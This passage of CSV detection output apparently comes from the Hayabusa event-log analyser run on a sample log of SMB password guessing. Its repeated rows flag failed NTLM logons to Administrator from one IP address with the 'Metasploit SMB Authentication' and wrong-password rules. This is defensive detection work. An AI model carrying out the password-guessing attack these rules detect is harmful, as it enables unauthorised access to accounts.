SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FDJ1IFpMNQ2Euhyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EGTzqnHJIiZdSgNk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: epSckAKbAp8qag89 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: NNC8ilAuznKPwFvV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wObt647cIBPiVaZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nYDe1L7NNxDGQ0Vt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXroClxv7B0aCTYv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kCVah2QOH1hMSV76 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2HjD65Xy4Hppim2l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwmEQxC4iTcF4aFu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q3QxOH7ok8RR068t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJFj6Ckw1HdK9w52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qqu3Im4HXQNyGnYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: bk5dmjQDnpSlREum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pk4BvYgXBR2whf80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6n1su2TUr7ONQr4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: givsEAGfG0smN9Re : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i2YuM0i7a2QuY7xb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xuocQPZpd91adY0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PvGB1dZrfDWyZoqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4oi8iL88rJo7g2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3OUnytXi4NjvqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WKkJcp3TYj31iJUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: G0E44RVqAE1feU0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny5LCb1qOIUhxOPY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9jcDgzzqH26DjQ1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yil94cFkU6UP24SK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkdVHF3vggCcuNdn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dRRI2CS3aVIX4nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: chDZq3VgxIE2mRb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HLVvgMmqLXKZADON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i4avO2AJSlNb0IUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mdo5CvycGvGhn33y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: heJfjLl1vbX6lMjZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOP1E6hd4Jtj4gob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xa7kMCNz0bEGTBqX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSxTQ4HsZt2DeYVe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxHpSQwFSV4hveVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n3OwzSPomxZLoCe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e9IfwDZIfYT6A50K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOf6DbRX4zlNqLdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00kXrnJNH40NyoYL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nsNHcb9pnpdRgeL7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ucMhgxMXy9Ch1jNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cfi3ZaLTECJgjM9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: usugjEEBHlhJvOyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQ1pM2CVLt5ITVD5 : IP Address: 192.168.198.149 : AuthPackage: 
